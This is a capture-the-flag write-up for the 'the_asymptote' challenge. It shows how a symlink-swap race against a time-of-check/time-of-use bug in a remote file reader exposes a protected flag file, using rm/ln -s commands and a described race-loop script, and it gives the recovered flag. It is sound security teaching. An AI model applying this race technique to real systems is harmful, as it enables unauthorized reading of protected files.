Skip to main content

the_asymptote

Challenge

Imported from local notes.md.

Solution

Original Notes

the_asymptote

Challenge Summary

  • Given: A remote service at nc 34.131.216.230 1338 with no downloadable files.
  • Goal: Recover the flag from the remote file reader.
  • Constraints: Flag format is IIITL{...}.

Initial Recon / Triage

  • Observations: Connecting to the service drops the user into a shell-like environment containing challenge, flag.txt, and welcome.txt.
  • File identification: challenge is executable but not readable by ctf. flag.txt is group-readable only by flag_group. The working directory itself is writable by ctf.
  • Entry points: The challenge program always reads welcome.txt and prints it.

Hypotheses & Approach

  • Hypothesis 1: challenge might accept a filename as an argument. Testing showed it ignores argv and still reads welcome.txt.
  • Hypothesis 2: The binary performs a permission check and then opens welcome.txt, making it vulnerable to a symlink-swap race. This was correct.

Execution Steps (Reproducible)

Stage 1

Commands:

nc 34.131.216.230 1338
ls -l
./challenge

Results:

  • The shell exposes:
    • challenge
    • flag.txt
    • welcome.txt
  • Running ./challenge prints the contents of welcome.txt.

Stage 2

Commands:

rm -f welcome.txt && ln -s flag.txt welcome.txt
./challenge

rm -f welcome.txt && ln -s welcome.bak welcome.txt
./challenge

Results:

  • Pointing welcome.txt at flag.txt causes: Security Alert: You don't have permission to read welcome.txt
  • Pointing welcome.txt at a readable file succeeds.
  • This indicates a time-of-check/time-of-use style permission bug on the path target.

Stage 3

Commands:

python3 /root/incognito2026CTF/the_asymptote/artifacts/exploit.py

Results:

  • exploit.py connects to the remote shell.
  • It preserves the original welcome.txt as welcome.bak.
  • It starts a tight background loop that flips welcome.txt between welcome.bak and flag.txt.
  • It repeatedly runs ./challenge until the permission check passes on the readable file and the subsequent open lands on flag.txt.
  • The successful output contains the flag: IIITL{4cc355_ch3ck_p4553d_bu7_f1l3_5w4pp3d_07b404a5c3f2}

Artifacts Produced

  • artifacts/exploit.py - final remote exploit script.
  • artifacts/solve.py - simple wrapper to run the exploit as the standard solver entry point.
  • artifacts/exploit_output.txt - captured transcript of the successful exploit run.

Flag

IIITL{4cc355_ch3ck_p4553d_bu7_f1l3_5w4pp3d_07b404a5c3f2}